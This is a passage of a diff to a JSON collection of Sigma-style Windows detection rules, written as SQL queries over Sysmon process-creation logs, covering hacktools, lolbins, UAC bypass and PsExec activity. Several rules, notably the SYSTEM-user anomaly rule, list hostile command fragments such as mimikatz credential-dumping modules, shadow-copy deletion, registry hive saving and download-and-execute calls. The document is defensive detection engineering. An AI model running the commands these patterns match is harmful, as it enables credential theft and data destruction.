Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "status": "test", - "description": "Detects suspicious IIS native-code module installations via command line", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Execute Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, oscd.community", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": "727454c0-d851-48b0-8b89-385611ab0704", + "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", "status": "test", - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "status": "test", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "status": "experimental", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1127" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate activity is expected since extracting files with a password can be common in some environement." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", + "status": "experimental", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ], + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", - "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrative use" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 